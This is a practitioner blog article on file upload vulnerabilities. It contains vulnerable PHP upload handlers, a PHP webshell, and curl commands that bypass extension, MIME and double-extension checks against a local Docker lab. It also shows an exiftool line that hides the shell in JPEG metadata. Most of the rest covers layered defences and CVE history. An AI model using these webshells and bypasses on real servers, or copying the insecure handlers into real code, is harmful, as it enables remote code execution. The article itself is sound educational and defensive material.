File Upload Vulnerabilities: 2026 Practitioner Guide

A file upload vulnerability is the cheapest one-step-from-RCE bug on the web. The attacker uploads a file the server is willing to execute, then makes a second request to that file's URL, and the server runs their code. Every weak validation pattern collapses into the same outcome: a webshell on disk, served by Apache or PHP-FPM or whatever the framework is, with the privileges of the application user.

Upload bugs are the ones I find easiest to demonstrate to a non-technical stakeholder. A .phar lands, a webshell opens, the room goes quiet. Easy to talk about, surprisingly hard to fully defend once you start counting all the ways a server can be coaxed into executing a blob it accepted as data.

This article is the deep dive companion to the web application security vulnerabilities taxonomy. I cover what the bug actually is, the four validation patterns I still see fail in code review, a working chain against a Dockerised lab, polyglots and image-borne shells, the defences that hold up in 2026, and a handful of real CVEs that put each pattern on a public record. Catalogued as CWE-434, this class is older than I am as a working engineer and is not going anywhere.

What is a file upload vulnerability?

A file upload vulnerability is any web upload feature where the server accepts a file whose name, content, or storage location lets the attacker get that file interpreted as code or markup rather than as opaque data. The server treats the upload as a passive blob (a profile picture, a CSV import, an attachment) while the attacker treats it as the first half of an attack that completes when the file is fetched, parsed, or executed.

The canonical bad code, in PHP, is one line of trust:

php

move_uploaded_file($_FILES['file']['tmp_name'], 'uploads/' . $_FILES['file']['name']);

There is no validation of the extension, the contents, or the destination. The attacker uploads shell.php with a body of <?php echo shell_exec($_GET['c']); ?>, requests uploads/shell.php?c=id, and the server runs id as www-data. Everything after this point is variations on the same theme: the validation that is supposed to prevent this turns out to be cosmetic, and the file ends up in a directory the web server is willing to execute from.

The trust failure is the same shape as SQL injection: user input is concatenated into something a downstream interpreter parses. The interpreter is just Apache plus mod_php instead of MySQL.

The four validation patterns that fail

Every weak upload validator I have looked at fits one of four shapes. They are listed in increasing order of effort, and decreasing order of how often I still see them in production.

Pattern 1: no validation at all

php

$dest = 'uploads/' . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $dest);

The function exists, it has a name in a routing table, and it does what the field implies: save the upload. There is no extension check, no MIME check, no size limit, no rename. Whatever bytes the client posted land on disk under whatever filename the client chose.

I still find this in 2026. It hides in admin tools that "only logged-in users can reach", in CMS plugin backends, in legacy file-manager modules that nobody touched after the original commit. The fact that it required authentication does not save anybody: the typical first credential leak (phishing, password reuse) hands the attacker a working session, and the bug is sitting behind it.

Pattern 2: extension blacklist (why blocklists always lose)

php

$blocked = ['php', 'phtml', 'php3', 'php4'];
$ext = strtolower(pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION));
if (in_array($ext, $blocked, true)) {
    die('Bad file type');
}
move_uploaded_file($_FILES['file']['tmp_name'], 'uploads/' . $_FILES['file']['name']);

This is the classic loss. Blocklisting "the dangerous extensions" requires the developer to enumerate every extension that the server is configured to execute, on the operating system, web server, language interpreters, and modules in play at deploy time. Real-world misses:

.phar (PHP archive, executed by mod_php when the handler is configured for it, which is common on hosts that ship PHAR support enabled)
.pht, .phtml, .php5, .php7, .phps (each one a default in some Apache or PHP package on some distribution)
.cgi, .pl (mod_cgi still ships, still gets enabled by mistake)
.html or .svg containing JavaScript (stored XSS rather than RCE, but same upload)
.htaccess itself, which lets the attacker rewrite the directory's handler config and then upload an innocently-named file that gets executed

The blocklist also has to fight encoding tricks: trailing dots (shell.php.), trailing spaces, null bytes in legacy PHP versions, alternate data streams on Windows hosts, and Unicode lookalikes. Every one of these has been the public root cause of a real bypass.

The structural problem is that a blocklist is a list of known bad. The set of executable extensions is open-ended, depends on server configuration the developer does not own, and grows when ops adds a new handler. An allowlist (['jpg', 'jpeg', 'png', 'gif', 'webp']) inverts that: the developer enumerates what the application needs, and rejects everything else. Allowlists fail closed; blocklists fail open. This is not a stylistic preference.

Pattern 3: MIME validation from the client-supplied Content-Type

php

if ($_FILES['file']['type'] !== 'image/jpeg') {
    die('Only JPEG allowed');
}
move_uploaded_file($_FILES['file']['tmp_name'], 'uploads/' . $_FILES['file']['name']);

$_FILES['file']['type'] is the Content-Type from the multipart body part the client sent. The client controls it. PHP's documentation has said so since the function was introduced. Every other web framework has the same field, with the same property. The check rejects exactly the attackers who do not know HTTP, which is none of them.

The bypass is one curl flag:

bash

curl -F 'file=@shell.php;type=image/jpeg' http://target.example/upload.php

The multipart part for file now carries Content-Type: image/jpeg while its body is PHP. The validator sees image/jpeg, the file lands on disk as shell.php, and the GET that follows executes it.

The "stronger" variant is server-side MIME sniffing, where the application reads the first few bytes of the upload and uses something like PHP's finfo_file() or libmagic. That is much better but still not enough on its own: a JPEG with appended PHP, or a polyglot crafted to satisfy both a JPEG parser and the PHP interpreter, passes the magic-byte check while still being executable. The MIME check is part of a real defence (see below) but is never the whole thing.

Pattern 4: double-extension and the Apache AddHandler trap

php

$ext = strtolower(pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION));
if (in_array($ext, ['php', 'phtml', 'phar'], true)) die('Bad file type');
move_uploaded_file($_FILES['file']['tmp_name'], 'uploads/' . $_FILES['file']['name']);

The validator is fine in isolation. pathinfo(..., PATHINFO_EXTENSION) returns the trailing extension only, so shell.php.jpg parses as jpg and gets accepted. The problem is what Apache does with the filename on the way back out.

Apache has two ways to map a filename to a handler:

SetHandler application/x-httpd-php inside a <FilesMatch \.php$> block: handler fires only when the trailing extension matches. Safe.
AddHandler application/x-httpd-php .php: handler fires when any segment of the filename matches .php. shell.php.jpg triggers it. So does shell.php.bak, shell.php.txt, shell.php.anything.

AddHandler is the default in a lot of older shared-hosting Apache configs. It is also the default in a handful of distribution-packaged PHP modules. A developer who validates the trailing extension correctly, against an upload directory whose .htaccess uses AddHandler, has shipped a working RCE without writing an obvious bug.

The fix at the application layer is the allowlist from Pattern 2; the fix at the server layer is to replace AddHandler with the <FilesMatch> form anywhere user uploads land. Both belong in the build.

Walk a working chain (lab)

Every exploit below runs against upload-basic from the techearl-labs companion repo. Bring it up:

bash

docker compose up upload-basic

The lab listens on http://localhost:8083. There are four endpoints, each implementing one of the validation patterns above. The webshell I post in every case is the same six-byte-of-real-logic file:

php

<?php echo shell_exec($_GET['c'] ?? 'id'); ?>

Save it as shell.php in the working directory. Then attack each endpoint in turn.

Chain 1: naive upload

bash

curl -F 'file=@shell.php' http://localhost:8083/upload-naive.php
curl 'http://localhost:8083/uploads/naive/shell.php?c=id'

The response to the second request is the output of id from inside the container. No validation, no rename, no surprises. This is the worst-case shape and the fastest exploit to demonstrate.

Chain 2: blacklist with the forgotten extension

The lab's blacklist blocks php, phtml, php3, php4. It forgets phar, and the lab's Apache config explicitly maps .phar to mod_php (a realistic misconfiguration: PHAR support gets enabled for a tool that needs it, the upload validator never gets updated to match).

bash

curl -F 'file=@shell.php;filename=shell.phar' http://localhost:8083/upload-blacklist.php
curl 'http://localhost:8083/uploads/blacklist/shell.phar?c=id'

The ;filename=shell.phar segment is how curl rewrites the multipart filename. The validator strips the extension, sees phar, checks the blocklist, finds nothing, and lets the file through. Apache then routes the request to mod_php on the way back out.

A case-flip variant (shell.phP) is a common tutorial bypass, but it only works on Apache builds that match extensions case-insensitively. Stock mod_php on Debian-based images matches \.php$ literally; case-flip does not bypass against this lab. The forgotten-extension variant is what holds up against the real world.

Chain 3: MIME with a forged Content-Type

bash

curl -F 'file=@shell.php;type=image/jpeg' http://localhost:8083/upload-mime.php
curl 'http://localhost:8083/uploads/mime/shell.php?c=id'

The ;type=image/jpeg segment sets the multipart Content-Type header for the file part to image/jpeg. The file's bytes are still raw PHP. The validator reads $_FILES['file']['type'], sees the attacker's chosen value, and accepts. Three seconds from start to RCE.

Chain 4: double extension and AddHandler

bash

cp shell.php shell.php.jpg
curl -F 'file=@shell.php.jpg' http://localhost:8083/upload-double-ext.php
curl 'http://localhost:8083/uploads/double-ext/shell.php.jpg?c=id'

The validator extracts the trailing extension as jpg, accepts the upload, and writes it to disk under its original name. The directory's .htaccess declares AddHandler application/x-httpd-php .php. Apache sees a filename that contains .php, fires the handler regardless of position, and executes the file.

Four endpoints, four bypasses, one webshell. None of these took more than two HTTP requests.

Beyond simple file types: polyglots and image-borne shells

If the validator is doing real magic-byte sniffing (Pattern 3 done correctly), the attacker stops trying to upload bare .php and starts shipping files that are valid as their declared type and executable when interpreted as code. These are polyglots, and they are the answer to "we check the file is really an image".

PHP in JPEG EXIF metadata

The simplest polyglot is a real JPEG with PHP embedded in an EXIF comment field:

bash

exiftool -Comment='<?php echo shell_exec($_GET["c"]); ?>' shell.jpg

The file is structurally a JPEG. file shell.jpg returns JPEG image data, finfo_file returns image/jpeg, libmagic agrees. Every content-type check passes. If the server then serves the file from a directory where .jpg is interpreted as PHP (Pattern 4) or includes the file via include() somewhere downstream, the PHP block executes. The image renders correctly in a browser, which means even a visual review misses it.

This is why content-type validation by itself is insufficient: the file is honestly what it claims to be, and also a webshell.

PDF + PHP polyglots

PDF and PHP both tolerate leading garbage. A file that starts with a valid PDF header, contains a PDF body, and has <?php ... ?> inserted in a place the PHP parser will find it can satisfy both a PDF reader and the PHP interpreter. PDF parsers ignore bytes outside the document structure they understand; PHP scans for the opening tag. The same approach works for some Office formats and for SVG (which is just XML and which Chrome renders as an active document; an SVG with <script> is a stored XSS that bypasses every "is this an image" check).

GIFAR and friends

GIFAR (GIF + JAR) was the original 2008 polyglot: a file that is a valid GIF for image-loaders and a valid Java archive for the Java plugin. The Java plugin is dead, so the original variant is mostly history, but the technique generalises. Modern equivalents include polyglots that are valid PNG and valid JavaScript (an <img> tag that an attacker convinces the page to include as a script), and ZIP polyglots that are valid image and valid archive (relevant for upload features that unpack archives server-side).

The defence is not a better polyglot detector. The defence is to never serve uploaded files from a context where their bytes can be interpreted as code. The next section is how.

Modern defences

Upload security is a stack. No single check is sufficient; the combination is what holds.

1. Allowlist on extension AND magic bytes

php

$allowed_ext = ['jpg', 'jpeg', 'png', 'gif', 'webp'];
$allowed_mime = ['image/jpeg', 'image/png', 'image/gif', 'image/webp'];

$ext = strtolower(pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION));
if (!in_array($ext, $allowed_ext, true)) {
    die('Extension not allowed');
}

$finfo = new finfo(FILEINFO_MIME_TYPE);
$mime = $finfo->file($_FILES['file']['tmp_name']);
if (!in_array($mime, $allowed_mime, true)) {
    die('Content does not match allowed types');
}

The extension allowlist is enforced first, against the trailing extension only, against a fixed set. The magic-byte check uses libmagic (finfo in PHP, python-magic in Python, mime-types is not enough in Node) to confirm the file body actually matches its declared type. Either check failing rejects the upload.

This still does not stop polyglots that satisfy both checks. It does stop everything in Patterns 1 through 4.

2. Randomise the stored filename

php

$ext = strtolower(pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION));
$stored = bin2hex(random_bytes(16)) . '.' . $ext;
move_uploaded_file($_FILES['file']['tmp_name'], '/var/uploads/' . $stored);

The attacker no longer controls the filename. Path traversal in the name is dead. Overwriting index.php is dead. Double-extension tricks are dead (the new name is <hex>.jpg, with one extension). Storing the original name in a database column for display is fine; storing it on disk is not.

3. Store outside the web root

Move the upload directory off whatever path Apache or Nginx serves. Files now live at /var/uploads/, not /var/www/public/uploads/. The web server cannot serve them at all without an explicit route. This single change defeats every variant of "upload a webshell and request it directly", because the file's URL does not exist.

4. Serve uploads through a controller

php

// /download.php?id=<id>
header('Content-Type: ' . $file->mime);
header('Content-Disposition: attachment; filename="' . $file->safe_name . '"');
header('X-Content-Type-Options: nosniff');
readfile($file->path);

The controller looks up the file by an opaque ID, sets the Content-Type the application chose (not whatever the file claims), adds Content-Disposition: attachment so the browser saves rather than renders, and adds X-Content-Type-Options: nosniff so the browser does not second-guess the type. An SVG-with-script no longer renders as active content; a polyglot served this way is a download, not an execution.

OWASP's guidance explicitly recommends both headers together and serving uploads from a separate isolated domain so that any successful XSS (e.g. an HTML upload) cannot reach session cookies on the main app.

5. Strip metadata

bash

exiftool -all= upload.jpg

Every uploaded image runs through metadata-stripping before storage. This kills EXIF-embedded webshells and incidentally also kills GPS coordinates and camera serial numbers (a privacy win). Server-side, ImageMagick, mat2, or a libvips re-encode pass does the same job.

Note that running uploads through an image library is itself a defence: a real JPEG decode followed by a re-encode produces a new file that contains only image data and discards any non-image bytes the original had appended.

6. Run files through ClamAV or YARA

bash

clamscan --infected --remove --recursive /var/uploads/

ClamAV catches known webshells (its signature database includes thousands of PHP, ASP, and JSP shells). YARA lets you write custom signatures for the patterns you care about (<?php immediately following image-format magic bytes, for instance). Neither catches a novel polyglot. Both raise the cost of off-the-shelf attacker tooling.

7. Drop execute permissions on the upload directory

bash

chmod 0644 /var/uploads/*
# or, at the Apache layer:
<Directory /var/uploads>
    Options -ExecCGI
    SetHandler default-handler
    RemoveHandler .php .phtml .phar
</Directory>

Belt-and-braces: even if a .php file makes it onto disk, the web server is configured to not interpret anything in that directory. Combined with storage outside the web root, this is two layers of "even if the file is there, it does not run".

Real-world incidents (CVE section)

Three CVEs that put each pattern on a public record, all verified against NVD as of the date of writing.

CVE-2016-3714 (ImageTragick)

Affected ImageMagick versions before 6.9.3-10 and 7.x before 7.0.1-1. The MVG, MSL, HTTPS, EPHEMERAL, TEXT, SHOW, WIN, and PLT coders failed to validate input before passing it to shell commands. An attacker uploaded an image file whose contents triggered one of those coders, and ImageMagick executed shell commands with the privileges of the process running it. CVSS 3.1 score 8.4 (HIGH); CVSS 2.0 score 10.0. Still in CISA's Known Exploited Vulnerabilities catalogue.

This is the case where the upload validator was correct (the file really was an image) and the bug was in the downstream tool that processed it. The defence is to upgrade ImageMagick, disable the vulnerable coders in policy.xml, and treat any user-supplied image as untrusted input to every library that touches it afterwards.

CVE-2017-5638 (Apache Struts Jakarta Multipart parser)

Affected Apache Struts 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1. Incorrect exception handling in the Jakarta Multipart file-upload parser meant that a crafted Content-Type header containing OGNL expressions (the canonical payload included a #cmd= segment) was evaluated as code rather than treated as a string. The result was unauthenticated RCE against any Struts 2 application that accepted file uploads, scoring 9.8 CRITICAL.

This is the case where the upload was incidental: the attacker did not need to upload a useful file, only to send a request the upload parser would handle. Equifax's 2017 breach traced back to this CVE.

CVE-2018-9206 (Blueimp jQuery File Upload)

Affected all versions of Blueimp's jQuery-File-Upload up to and including 9.22.0. The upstream server component shipped with an example PHP handler that accepted any uploaded file and stored it inside the web root. Newer Apache versions had moved away from a default .htaccess that the library relied on to block executable extensions; the library's defence quietly broke when the surrounding ecosystem changed. CVSS 3.1 score 9.8 CRITICAL.

This is the case where the validator was the surrounding server config, and the surrounding server config changed underneath it. The library itself had a fix within days; the harder problem was finding and patching every fork (there were thousands on GitHub). The lesson is to never depend on server defaults for security-critical behaviour, and to assert the behaviour you need explicitly in your own config.

FAQ

No. The Content-Type in the multipart upload body is attacker-controlled. A curl flag rewrites it in a single character. Server-side magic-byte sniffing with libmagic is the real version of this check, and even that is only one layer: a JPEG with PHP appended to EXIF metadata is a real JPEG by every magic-byte test. Combine extension allowlisting, magic-byte sniffing, metadata stripping, and never serving uploads from an executable path.

It stops the most damaging variant. An SVG or HTML upload that contains JavaScript, served from uploads.example.com instead of www.example.com, runs in a different origin and cannot read session cookies on the main domain. The attacker can still serve malicious content from your subdomain (phishing, drive-by, malvertising), so it is a containment measure, not a fix. Pair it with Content-Disposition: attachment and X-Content-Type-Options: nosniff and you have the full OWASP-recommended setup.

It blocks Apache from executing the file, which is most of what you want. It does not solve everything: Content-Type sniffing in older browsers, polyglot files that some clients render anyway, and any code path on your server that later reads the file by content rather than extension. Rename plus randomise plus store-outside-webroot plus controller-served downloads is the safe combination; rename alone is one layer.

An allowlist enumerates the set of values you expect. A blacklist enumerates the set you do not expect. The set of dangerous extensions on a given Apache or Nginx install depends on the operating system, the web server build, the language interpreters, the modules enabled, and any custom handlers, and that set changes when ops adds a new module. You cannot enumerate something you do not own. Allowlists fail closed when the environment changes; blacklists fail open.

No. ClamAV catches known signatures of known webshells and malware, which raises the cost of off-the-shelf attacker tooling but does nothing against a novel polyglot or a webshell variant the signature database has not seen. Treat ClamAV as detection and as a deterrent against opportunistic uploads, not as the control that decides whether an upload is safe. The controls that decide are extension allowlisting, magic-byte sniffing, storage outside the web root, and controller-served downloads.

S3 helps with two things: the file is not on your web server's disk, and S3 will not execute it. It does not help with the file's contents (a malicious SVG served from an S3 bucket with a permissive Content-Type still XSSes whoever opens it) or with what your application does after the upload (if you image-process it, ImageMagick still has the same coder bugs). Sign S3 uploads server-side, set Content-Disposition and X-Content-Type-Options on the bucket policy, serve through a CloudFront distribution on a separate domain, and validate content before you accept it. The cloud is a deployment choice; the validation stack is the same.

PHP 5.3.4 and later reject null bytes in filenames passed to filesystem functions. The bug where shell.php\x00.jpg was treated as shell.php by pathinfo() and as the full string by move_uploaded_file() is therefore a problem only against PHP 5.3.3 and earlier, which you should not be running. The structural lesson, that user input crosses a trust boundary every time it touches a system call, is what to take from it.

Where to go next

Compare the practical tools in the best file upload exploitation tools for 2026.
Back up to the web application security vulnerabilities taxonomy for the full map of related classes (RCE, path traversal, SSRF, deserialization).
For the closest cousin in shape (untrusted input as code, parser confusion, one-step-from-RCE), read the SQL injection guide.

File Upload Vulnerabilities: The Complete 2026 Practitioner Guide

What is a file upload vulnerability?

The four validation patterns that fail

Pattern 1: no validation at all

Pattern 2: extension blacklist (why blocklists always lose)

Pattern 3: MIME validation from the client-supplied Content-Type

Pattern 4: double-extension and the Apache AddHandler trap

Walk a working chain (lab)

Chain 1: naive upload

Chain 2: blacklist with the forgotten extension

Chain 3: MIME with a forged Content-Type

Chain 4: double extension and AddHandler

Beyond simple file types: polyglots and image-borne shells

PHP in JPEG EXIF metadata

PDF + PHP polyglots

GIFAR and friends

Modern defences

1. Allowlist on extension AND magic bytes

2. Randomise the stored filename

3. Store outside the web root

4. Serve uploads through a controller

5. Strip metadata

6. Run files through ClamAV or YARA

7. Drop execute permissions on the upload directory

Real-world incidents (CVE section)

CVE-2016-3714 (ImageTragick)

CVE-2017-5638 (Apache Struts Jakarta Multipart parser)

CVE-2018-9206 (Blueimp jQuery File Upload)

FAQ

Where to go next

Sources

Ishan Karunaratne

Related posts

Insecure Deserialization: The Complete 2026 Practitioner Guide

Application-Layer DoS: The Complete 2026 Practitioner Guide

XML External Entity (XXE): The Complete 2026 Practitioner Guide

Is checking Content-Type: image/jpeg ever safe on its own?

Does serving uploads from a separate subdomain stop XSS-via-upload?

Can I just rename every upload to .txt and serve it that way?

Why are allowlists always better than blacklists for upload validation?

Is ClamAV enough to make file uploads safe?

What about uploading to S3 or another object store, does that solve it?

Do modern PHP versions still have the null-byte filename bug?

Sources

Ishan Karunaratne